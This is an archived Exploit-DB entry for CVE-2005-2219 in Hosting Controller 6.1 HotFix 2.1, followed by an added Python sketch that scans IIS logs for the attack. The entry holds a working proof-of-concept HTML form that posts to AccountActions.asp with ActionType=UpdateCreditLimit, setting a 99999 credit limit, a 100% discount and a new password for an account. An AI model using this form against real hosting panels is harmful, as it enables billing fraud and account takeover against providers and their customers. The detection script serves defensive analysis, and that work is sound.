Hosting Controller <= 0.6.1 HotFix 2.1 Change Credit Limit Exploit

2005-07-10T00:00:00
ID EDB-ID:1096
Type exploitdb
Reporter Soroush Dalili
Modified 2005-07-10T00:00:00

Description

Hosting Controller <= 0.6.1 HotFix 2.1 Change Credit Limit Exploit. CVE-2005-2219. Remote exploit for windows platform

                                        
Hi, I'm Soroush Dalili from GSG (GrayHatz Security Group).
Title: The Hosting Controller program has a security bug in "AccountActions.asp" that lets an authenticated 
user change his/her credit and buy some services!

Version: 6.1 HotFix 2.1 and older
Developer url: hostingcontroller.com
Comment: Hosting Controller is an application to manage a host.
Proof-of-concept exploit code:
--------------------------------
GET CREDIT<br>Soroush Dalili from GSG<br>
<form action="http://[URL]/Admin/Accounts/AccountActions.asp?ActionType=UpdateCreditLimit" method="post">
<table>
<tr>
<td>Username:</td>
<td><input type="text" name="UserName" value=""></td>
</tr>
<tr>
<td>Description:</td>
<td><input type="text" name="Description" value=""></td>
</tr>
<tr>
<td>FullName:</td>
<td><input type="text" name="FullName" value=""></td>
</tr>
<tr>
<td>AccountDisabled 1,[blank]:</td>
<td><input type="text" name="AccountDisabled" value=""></td>
</tr>
<tr>
<td>UserChangePassword:</td>
<td><input type="text" name="UserChangePassword" value=""></td>
</tr>
<tr>
<td>PassCheck=TRUE,0:</td>
<td><input type="text" name="PassCheck" value="0"></td>
</tr>
<tr>
<td>New Password:</td>
<td><input type="text" name="Pass1" value=""></td>
</tr>
<tr>
<td>DefaultDiscount%:</td>
<td><input type="text" name="DefaultDiscount" value="100"></td>
</tr>
<tr>
<td>CreditLimit:</td>
<td><input type="text" name="CreditLimit" value="99999"></td>
</tr>
</table>
<br><input type="submit">
</form>
<hr><br>

# milw0rm.com [2005-07-10]
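
Detection sketch for the request shown above, added here as an example and not part of the original advisory or of Hosting Controller: it scans IIS W3C logs for POSTs to AccountActions.asp with ActionType=UpdateCreditLimit and flags those that come from outside the administrators' networks or whose Referer is not the panel itself, as happens when the form is hosted elsewhere. The function name, panel host name, admin network and sample log lines are assumptions constructed for illustration.

```python
import ipaddress
from urllib.parse import parse_qs, urlsplit

# Constructed sample IIS W3C log: hosts, IPs, times and the non-credit action are made up.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs(Referer)
2005-07-11 09:14:02 10.0.0.5 POST /Admin/Accounts/AccountActions.asp ActionType=UpdateCreditLimit 200 http://panel.example.test/Admin/Accounts/
2005-07-11 09:20:41 203.0.113.7 POST /Admin/Accounts/AccountActions.asp ActionType=UpdateCreditLimit 200 -
2005-07-11 09:21:10 203.0.113.7 GET /Admin/Accounts/AccountActions.asp ActionType=UpdateCreditLimit 200 -
2005-07-11 09:25:33 198.51.100.9 POST /admin/accounts/accountactions.asp actiontype=updatecreditlimit 302 http://other.example.test/form.html
2005-07-11 09:30:00 198.51.100.9 POST /Admin/Accounts/AccountActions.asp ActionType=SomethingElse 200 -
"""

TARGET_STEM = "/admin/accounts/accountactions.asp"
TARGET_ACTION = "updatecreditlimit"

def find_suspect_credit_updates(log_text, panel_host, admin_nets):
    """Return (timestamp, client_ip, reason) for each suspicious credit-limit POST."""
    nets = [ipaddress.ip_network(n) for n in admin_nets]
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names for the rows that follow
            continue
        if not line or line.startswith("#"):
            continue
        row = dict(zip(fields, line.split()))
        # IIS serves paths case-insensitively, so compare in lower case.
        if row.get("cs-method") != "POST" or row.get("cs-uri-stem", "").lower() != TARGET_STEM:
            continue
        query = parse_qs(row.get("cs-uri-query", "").lower())
        if TARGET_ACTION not in query.get("actiontype", []):
            continue
        reasons = []
        if not any(ipaddress.ip_address(row["c-ip"]) in n for n in nets):
            reasons.append("client outside admin networks")
        referer = row.get("cs(Referer)", "-")
        if (urlsplit(referer).hostname or "") != panel_host:
            reasons.append("referer not from panel")
        if reasons:
            hits.append((row["date"] + " " + row["time"], row["c-ip"], "; ".join(reasons)))
    return hits

if __name__ == "__main__":
    for hit in find_suspect_credit_updates(SAMPLE_LOG, "panel.example.test", ["10.0.0.0/24"]):
        print(hit)
```

The Referer header is supplied by the client, so a matching Referer does not clear a request; treat hits as triage leads and compare them against the account's credit history.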